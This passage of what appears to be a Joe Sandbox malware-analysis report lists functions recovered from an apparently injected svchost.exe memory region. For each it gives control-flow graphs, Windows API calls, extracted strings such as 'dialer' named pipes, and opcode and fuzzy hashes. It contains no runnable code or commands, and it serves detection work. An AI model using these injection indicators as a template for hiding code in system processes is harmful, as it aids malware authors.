                                                                                                                                                                                            control_flow_graph 322 1f28a04ce28-1f28a04ce4a call 1f28a056080 325 1f28a04ce69-1f28a04ce74 FlsSetValue 322->325 326 1f28a04ce4c-1f28a04ce57 FlsGetValue 322->326 329 1f28a04ce76-1f28a04ce79 325->329 330 1f28a04ce7b-1f28a04ce80 325->330 327 1f28a04ce59-1f28a04ce61 326->327 328 1f28a04ce63 326->328 331 1f28a04ced5-1f28a04cee0 call 1f28a056130 327->331 328->325 329->331 332 1f28a04ce85 call 1f28a04d6cc 330->332 338 1f28a04cee2-1f28a04cef4 331->338 339 1f28a04cef5-1f28a04cf0b call 1f28a04c748 331->339 333 1f28a04ce8a-1f28a04ce96 332->333 335 1f28a04cea8-1f28a04ceb2 FlsSetValue 333->335 336 1f28a04ce98-1f28a04ce9f FlsSetValue 333->336 341 1f28a04cec6-1f28a04ced0 call 1f28a04cb94 call 1f28a04d744 335->341 342 1f28a04ceb4-1f28a04cec4 FlsSetValue 335->342 340 1f28a04cea1-1f28a04cea6 call 1f28a04d744 336->340 351 1f28a04cf28-1f28a04cf33 FlsSetValue 339->351 352 1f28a04cf0d-1f28a04cf18 FlsGetValue 339->352 340->329 341->331 342->340 355 1f28a04cf98-1f28a04cf9f call 1f28a04c748 351->355 356 1f28a04cf35-1f28a04cf3a 351->356 353 1f28a04cf22 352->353 354 1f28a04cf1a-1f28a04cf1e 352->354 353->351 354->355 357 1f28a04cf20 354->357 359 1f28a04cf3f call 1f28a04d6cc 356->359 360 1f28a04cf8f-1f28a04cf97 357->360 362 1f28a04cf44-1f28a04cf50 359->362 363 1f28a04cf62-1f28a04cf6c FlsSetValue 362->363 364 1f28a04cf52-1f28a04cf59 FlsSetValue 362->364 365 1f28a04cf6e-1f28a04cf7e FlsSetValue 363->365 366 1f28a04cf80-1f28a04cf8a call 1f28a04cb94 call 1f28a04d744 363->366 367 1f28a04cf5b-1f28a04cf60 call 1f28a04d744 364->367 365->367 366->360 367->355
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 000001F28A04CE37
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CE4C
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CE6D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CE9A
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CEAB
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CEBC
                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 000001F28A04CED7
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CF0D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000001F28A04ECCC,?,?,?,?,000001F28A04BF9F,?,?,?,?,?,000001F28A047AB0), ref: 000001F28A04CF2C
                                                                                                                                                                                              • Part of subcall function 000001F28A04D6CC: HeapAlloc.KERNEL32 ref: 000001F28A04D721
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CF54
                                                                                                                                                                                              • Part of subcall function 000001F28A04D744: HeapFree.KERNEL32 ref: 000001F28A04D75A
                                                                                                                                                                                              • Part of subcall function 000001F28A04D744: GetLastError.KERNEL32 ref: 000001F28A04D764
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CF65
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28A050A6B,?,?,?,000001F28A05045C,?,?,?,000001F28A04C84F), ref: 000001F28A04CF76
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction ID: 82bdf324c8f625488747e9ebd2c0ce28ffee8d3d747af44127512de69f9fb0c8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E41393024324766FA68A77655553FA22C27B84BFCF148738EA36477E7EE7884118F02
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A042244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction ID: 656cacdcf83600b694d5997ca4c8c1d341b953f54dc3c8aac8a80c39e77412db
                                                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A213A36A14B4292EB10CB25E4443AA67E0F789BE9F544225EA5903AA8CF3CC149CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A019944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 473 1f28a019944-1f28a0199ac call 1f28a01a814 476 1f28a019e13-1f28a019e1b call 1f28a01bb48 473->476 477 1f28a0199b2-1f28a0199b5 473->477 477->476 478 1f28a0199bb-1f28a0199c1 477->478 480 1f28a0199c7-1f28a0199cb 478->480 481 1f28a019a90-1f28a019aa2 478->481 480->481 485 1f28a0199d1-1f28a0199dc 480->485 483 1f28a019d63-1f28a019d67 481->483 484 1f28a019aa8-1f28a019aac 481->484 488 1f28a019d69-1f28a019d70 483->488 489 1f28a019da0-1f28a019daa call 1f28a018a34 483->489 484->483 486 1f28a019ab2-1f28a019abd 484->486 485->481 487 1f28a0199e2-1f28a0199e7 485->487 486->483 491 1f28a019ac3-1f28a019aca 486->491 487->481 492 1f28a0199ed-1f28a0199f7 call 1f28a018a34 487->492 488->476 493 1f28a019d76-1f28a019d9b call 1f28a019e1c 488->493 489->476 499 1f28a019dac-1f28a019dcb call 1f28a016d40 489->499 495 1f28a019c94-1f28a019ca0 491->495 496 1f28a019ad0-1f28a019b07 call 1f28a018e10 491->496 492->499 507 1f28a0199fd-1f28a019a28 call 1f28a018a34 * 2 call 1f28a019124 492->507 493->489 495->489 500 1f28a019ca6-1f28a019caa 495->500 496->495 511 1f28a019b0d-1f28a019b15 496->511 504 1f28a019cba-1f28a019cc2 500->504 505 1f28a019cac-1f28a019cb8 call 1f28a0190e4 500->505 504->489 510 1f28a019cc8-1f28a019cd5 call 1f28a018cb4 504->510 505->504 517 1f28a019cdb-1f28a019ce3 505->517 540 1f28a019a48-1f28a019a52 call 1f28a018a34 507->540 541 1f28a019a2a-1f28a019a2e 507->541 510->489 510->517 515 1f28a019b19-1f28a019b4b 511->515 519 1f28a019c87-1f28a019c8e 515->519 520 1f28a019b51-1f28a019b5c 515->520 523 1f28a019df6-1f28a019e12 call 1f28a018a34 * 2 call 1f28a01baa8 517->523 524 1f28a019ce9-1f28a019ced 517->524 519->495 519->515 520->519 525 1f28a019b62-1f28a019b7b 520->525 523->476 526 1f28a019cef-1f28a019cfe call 1f28a0190e4 524->526 527 1f28a019d00 524->527 528 1f28a019c74-1f28a019c79 525->528 529 1f28a019b81-1f28a019bc6 call 1f28a0190f8 * 2 525->529 537 1f28a019d03-1f28a019d0d call 1f28a01a8ac 526->537 527->537 533 1f28a019c84 528->533 554 1f28a019c04-1f28a019c0a 529->554 555 1f28a019bc8-1f28a019bee call 1f28a0190f8 call 1f28a01a038 529->555 533->519 537->489 552 1f28a019d13-1f28a019d61 call 1f28a018d44 call 1f28a018f50 537->552 540->481 558 1f28a019a54-1f28a019a74 call 1f28a018a34 * 2 call 1f28a01a8ac 540->558 541->540 545 1f28a019a30-1f28a019a3b 541->545 545->540 550 1f28a019a3d-1f28a019a42 545->550 550->476 550->540 552->489 562 1f28a019c7b 554->562 563 1f28a019c0c-1f28a019c10 554->563 573 1f28a019c15-1f28a019c72 call 1f28a019870 555->573 574 1f28a019bf0-1f28a019c02 555->574 578 1f28a019a76-1f28a019a80 call 1f28a01a99c 558->578 579 1f28a019a8b 558->579 564 1f28a019c80 562->564 563->529 564->533 573->564 574->554 574->555 583 1f28a019a86-1f28a019def call 1f28a0186ac call 1f28a01a3f4 call 1f28a0188a0 578->583 584 1f28a019df0-1f28a019df5 call 1f28a01baa8 578->584 579->481 583->584 584->523
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction ID: 5a10dad43b3f7039d8562b1dca765d6990f658072368d77462d2f59a589f5866
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 55E17972604B83AAEB609FA5D4803ED7BE0F745BD8F500526EE8957B9ACF34C595CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 594 1f28a04a544-1f28a04a5ac call 1f28a04b414 597 1f28a04a5b2-1f28a04a5b5 594->597 598 1f28a04aa13-1f28a04aa1b call 1f28a04c748 594->598 597->598 600 1f28a04a5bb-1f28a04a5c1 597->600 601 1f28a04a5c7-1f28a04a5cb 600->601 602 1f28a04a690-1f28a04a6a2 600->602 601->602 606 1f28a04a5d1-1f28a04a5dc 601->606 604 1f28a04a6a8-1f28a04a6ac 602->604 605 1f28a04a963-1f28a04a967 602->605 604->605 607 1f28a04a6b2-1f28a04a6bd 604->607 609 1f28a04a969-1f28a04a970 605->609 610 1f28a04a9a0-1f28a04a9aa call 1f28a049634 605->610 606->602 608 1f28a04a5e2-1f28a04a5e7 606->608 607->605 611 1f28a04a6c3-1f28a04a6ca 607->611 608->602 612 1f28a04a5ed-1f28a04a5f7 call 1f28a049634 608->612 609->598 613 1f28a04a976-1f28a04a99b call 1f28a04aa1c 609->613 610->598 623 1f28a04a9ac-1f28a04a9cb call 1f28a047940 610->623 615 1f28a04a894-1f28a04a8a0 611->615 616 1f28a04a6d0-1f28a04a707 call 1f28a049a10 611->616 612->623 627 1f28a04a5fd-1f28a04a628 call 1f28a049634 * 2 call 1f28a049d24 612->627 613->610 615->610 620 1f28a04a8a6-1f28a04a8aa 615->620 616->615 631 1f28a04a70d-1f28a04a715 616->631 624 1f28a04a8ba-1f28a04a8c2 620->624 625 1f28a04a8ac-1f28a04a8b8 call 1f28a049ce4 620->625 624->610 630 1f28a04a8c8-1f28a04a8d5 call 1f28a0498b4 624->630 625->624 638 1f28a04a8db-1f28a04a8e3 625->638 662 1f28a04a648-1f28a04a652 call 1f28a049634 627->662 663 1f28a04a62a-1f28a04a62e 627->663 630->610 630->638 636 1f28a04a719-1f28a04a74b 631->636 640 1f28a04a887-1f28a04a88e 636->640 641 1f28a04a751-1f28a04a75c 636->641 643 1f28a04a9f6-1f28a04aa12 call 1f28a049634 * 2 call 1f28a04c6a8 638->643 644 1f28a04a8e9-1f28a04a8ed 638->644 640->615 640->636 641->640 645 1f28a04a762-1f28a04a77b 641->645 643->598 647 1f28a04a8ef-1f28a04a8fe call 1f28a049ce4 644->647 648 1f28a04a900 644->648 649 1f28a04a874-1f28a04a879 645->649 650 1f28a04a781-1f28a04a7c6 call 1f28a049cf8 * 2 645->650 658 1f28a04a903-1f28a04a90d call 1f28a04b4ac 647->658 648->658 654 1f28a04a884 649->654 678 1f28a04a7c8-1f28a04a7ee call 1f28a049cf8 call 1f28a04ac38 650->678 679 1f28a04a804-1f28a04a80a 650->679 654->640 658->610 670 1f28a04a913-1f28a04a961 call 1f28a049944 call 1f28a049b50 658->670 662->602 677 1f28a04a654-1f28a04a674 call 1f28a049634 * 2 call 1f28a04b4ac 662->677 663->662 669 1f28a04a630-1f28a04a63b 663->669 669->662 674 1f28a04a63d-1f28a04a642 669->674 670->610 674->598 674->662 700 1f28a04a676-1f28a04a680 call 1f28a04b59c 677->700 701 1f28a04a68b 677->701 694 1f28a04a815-1f28a04a872 call 1f28a04a470 678->694 695 1f28a04a7f0-1f28a04a802 678->695 683 1f28a04a87b 679->683 684 1f28a04a80c-1f28a04a810 679->684 688 1f28a04a880 683->688 684->650 688->654 694->688 695->678 695->679 704 1f28a04a686-1f28a04a9ef call 1f28a0492ac call 1f28a04aff4 call 1f28a0494a0 700->704 705 1f28a04a9f0-1f28a04a9f5 call 1f28a04c6a8 700->705 701->602 704->705 705->643
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction ID: e968e1f774a518c1ba2bc3143856256c9feaebf137d0cfccd4ffb591007f091c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction Fuzzy Hash: EFE16B7260AB82AAFB609F6594803ED77E4F7457DCF108126EE8957B9ACF34C491CB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction ID: ce775f156198395478f7ecd0b8ad950eaa2e5e63ba9bb0ea7f5e3a902b998efb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction Fuzzy Hash: F341D232712A03B1FA56CB66A8047F623D1B789BE8F19C535DD0A97785EE7CC4458B10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000001F28A04C7DE,?,?,?,?,?,?,?,?,000001F28A04CF9D,?,?,00000001), ref: 000001F28A04D087
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A04C7DE,?,?,?,?,?,?,?,?,000001F28A04CF9D,?,?,00000001), ref: 000001F28A04D0A6
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A04C7DE,?,?,?,?,?,?,?,?,000001F28A04CF9D,?,?,00000001), ref: 000001F28A04D0CE
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A04C7DE,?,?,?,?,?,?,?,?,000001F28A04CF9D,?,?,00000001), ref: 000001F28A04D0DF
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001F28A04C7DE,?,?,?,?,?,?,?,?,000001F28A04CF9D,?,?,00000001), ref: 000001F28A04D0F0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction ID: 3bede4d017c40e211e74ab8793a60f1909018e0b85f7fd967ad40bfbcca29809
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75114C7070624B65FA68A76559513FA61C17B447F8F148378E929477EADE78C4028F00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A047510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 26760dca5aee30369e50a8115c69705a9ff557afc4573f31f1d9777720bcb9b7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D81D370A02743AAFB54AB6994413F923D1BB857CCF58C439EA0897797DF38C9458F00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A049DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction ID: cf485724233a5e3b5bc16c53d2e708a90744aba0ad533ddba81aa4349fed85d6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A319E31213A43B1EE62DB83A8107F522D4B748BE8F598935DD2E2B795EF39C4858B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A053DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction ID: 9516f04b1871981701696c41f3eeef4383bdad43f88631690619ec8ad2f7d5b4
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93118F31B10B4396E7508B56F8543BA76E0F788FE9F084234EA5A977A5CF78C9148B44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A043790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                            • String ID: wr
                                                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction ID: 74d73add1f3987555b20c77b93398ccd37d5819a176d6e6e9a8376f205a8707b
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5011393AB05B4392EF549B21E4083BAA2E0FB88BD9F485439DE8907794EF3DC545CB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A045B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction ID: a0a8480e1f0a23f963de51496efe857e48f04a0aa485bbca31cd83e98ff31cf2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CD19C76205B8A96DA709B4AE4903AA77E0F7C8BC8F105126EACD47BA5CF3CC551CF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A042F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID: dialer
                                                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction ID: dc0a490c0bb0f81b9bc7868179370f1241e07a68a928be331ac6def732a323d3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B314A32702B57A2EB55DF16E5407B967E0FB48BC8F488134DE4847B56EF34D4A18B40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0414A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
